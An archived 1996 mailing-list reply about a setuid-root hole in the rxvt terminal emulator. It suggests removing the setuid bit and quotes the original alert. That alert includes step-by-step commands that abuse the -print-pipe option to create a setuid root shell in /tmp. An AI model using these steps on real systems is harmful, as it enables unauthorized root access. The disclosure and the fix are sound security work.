[Prev][Next][Index]
Re: [Fwd: SECURITY: rxvt security hole]
I think it's fair to release a fix with such a thing.
The fix is:
# find / -name rxvt -print
/usr/X11/bin/rxvt
/other/possible/locations/rxvt
# chmod -s /usr/X11/bin/rxvt
# chmod -s /other/possible/location/rxvt
# ....
This will have one negative effect: if a user opens several rxvts, you
will not see him logged in more than once.
On Fri, 12 Jan 1996, Gilad Gam wrote:
> Hi,
>
> This one is a REAL alert, try it and you get root in 30 seconds...
>
> Gilad.
>
>
> David J Meltzer wrote:
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >
> > [This was recently forwarded over the linux-alert mailing list. I left
> > the full text of the exploit in this post due to the fact that it is
> > already quite well publicized. I have not verified the exploit code
> > myself. --Jeff.]
> >
> > There is a major security hole in rxvt, a terminal emulator for X, when it
> > is run on systems suid root, as is required on many configurations in order to
> > write to the utmp file. It is obvious from the code that this program was
> > not written to be run suid root, its a pity that sysadmins that install the
> > compiled versions of this sort of code don't see the same warnings of 'run
> > suid root at your own risk' that the people that put together a distribution
> > with it that way see in the makefile.
> > The conditions that allow this particular hole to be exploited is rxvt
> > compiled with the PRINT_PIPE option, and is running suid root. The program
> > sets the pipe to "lpr", without a pathname, but its even easier than that
> > to exploit because we can set the pipe to whatever we want with the -print-pipe
> > option on the rxvt command line. Although the programs gives up its root
> > privileges when forking to runn a shell or other command, the original program
> > continues running suid root the entire execution of the program.
> > Because the popen() call runs as root, whatever program that pipe opens
> > will execute immediately as root. In order to start the printer pipe, the
> > vt100 printer-on command is ESC[5i. The pipe can then be closed with the
> > printer-off commad, ESC[4i. Exploiting this is extremely easy.
> >
> > Program: rxvt
> > Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
> > rxvt suid root (and compiled with PRINT_PIPE)
> > Requirements: account on system, X server
> > Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
> > Security Compromise: root
> > Author: Dave M. (davem@cmu.edu)
> > Synopsis: rxvt fails to give up root privileges before
> > opening a pipe to a program that can be specified
> > by the user.
> >
> > Exploit:
> > 1. Set DISPLAY environment variable if necessary so you can use x clients.
> > 2. In user shell:
> > $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
> > $ chmod +x /tmp/rxbug
> > $ rxvt -print-pipe /tmp/rxbug
> > 3. In rxvt xclient:
> > $ cat
> > ESC[5i
> > ESC[4i
> > (The client will close at this point with a broken pipe)
> > 4. $ /tmp/rxsh
> > # whoami
> > root
> > #
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
> >
> > iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
> > r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
> > ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
> > r16NALs+Zwo=
> > =BzNN
> > -----END PGP SIGNATURE-----
> >
> > ------------------------------------------------------------------------
> > The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> > were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> > have their implicit approval for security announcements, by prior
> > arrangement.
> > ------------------------------------------------------------------------
>
--------------------------------------------- ....- --.. ----. -.. --. .
Arik Baratz, Regularus Studentus, iNTP, 4Z9DGE
---------------------------------------------------------------------------
"Your conscious mind is very intelligent, and your unconscious mind
is a hell of a lot smarter than you are."
- Erickson H. Milton
http://ccarik.technion.ac.il/~arikb